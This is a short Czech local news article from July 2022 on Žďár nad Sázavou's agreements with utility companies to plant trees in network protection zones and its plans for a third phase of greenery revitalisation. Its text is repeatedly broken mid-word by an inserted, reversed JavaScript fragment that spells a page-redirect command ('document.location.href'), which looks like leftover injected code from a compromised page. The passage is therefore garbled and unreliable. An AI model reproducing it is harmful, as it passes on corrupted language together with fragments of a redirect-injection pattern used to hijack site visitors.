Rainbow page separator

Ve Žďáře zjišťují, kde by ještě mohla přibýt veřejná zeleň

Středa, 13. července 2022

Žďár nad Sázavou / S telekomunikační společností CETIN dojednala žďárská radnice možnost výsadby zeleně do ochranných pásem sítí. Už dříve se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totéž podařilo domluvit i se společností SATT a s plynaři. Aktuálně bude měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jednat s E.ONem, respektive jeho distribuční společností ED.G. „Jde o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, aby za určitých podmínek bylo možné sázet stromy v ochranných pásmech sítí; cílem memorand a smluv je snaha o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, aby ve městě přibylo míst, kam se ještě dá zeleň vysadit,“ uvedl žďárský starosta Martin Mrkos. V té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to souvislosti radnice začíná připravovat v pořadí třetí etapu revitalizace veřejné zeleně. Ta by měla přibýt právě v místech, kde dosud není, ale bude tam mít svoje opodstatnění.
Loni skončila druhá etapa revitalizace městské zeleně, jež se týkala obnovy stromořadí, kdy byly ve dvanácti lokalitách vysazeny téměř čtyři s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky dřevin. První etapa revitalizace byla zrealizována před čtyřmi lety, tehdy šlo o zásahy v okolí hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova v Jamské ulici, Horního rybníka, hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova u kostela Nejsvětější Trojice, ve čtvrti Vodojem či Palachově, Haškově, Neumannově a Chelčického ulici.